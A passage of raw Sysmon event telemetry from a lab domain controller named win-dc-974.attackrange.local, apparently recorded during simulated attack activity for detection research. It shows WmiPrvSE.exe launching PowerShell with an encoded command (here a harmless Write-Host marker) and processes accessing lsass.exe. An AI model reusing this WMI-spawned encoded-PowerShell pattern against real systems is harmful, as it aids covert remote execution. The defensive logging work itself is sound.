RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237174Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237173Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D64-603E-7DAA-00000000AD01}1449211804C:\Windows\system32\conhost.exe{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237172Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237171Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237170Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237169Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237168Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237167Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237166Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_i2vpybfr.mrq.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237165Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.497{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237164Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.474{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1vka4hfo.k24.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237163Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.474{05ADC7E1-6D64-603E-76AA-00000000AD01}8976ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237162Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.474{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-7DAA-00000000AD01}14492C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237161Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.474{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-78AA-00000000AD01}10508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237160Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.474{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-78AA-00000000AD01}10508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237159Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.474{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237158Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.474{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237157Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.474{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237156Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.474{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237155Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.474{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237154Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.474{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237153Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.474{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002237152Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.483{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -EncodedC VwByAGkAdABlAC0ASABvAHMAdAAgADkANwA4ADQANwAxADcAOQAtAGYAYwAxADIALQA0ADAAOABiAC0AYQA1ADMAOQAtADAAOABiADUAZgBmAGIANQBjADYANwAxAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 11241100x80000000000000002237151Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.474{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1vka4hfo.k24.ps12021-03-02 16:52:52.474 10341000x80000000000000002237150Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.450{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237149Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.450{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7BAA-00000000AD01}11996C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237148Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.450{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237147Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 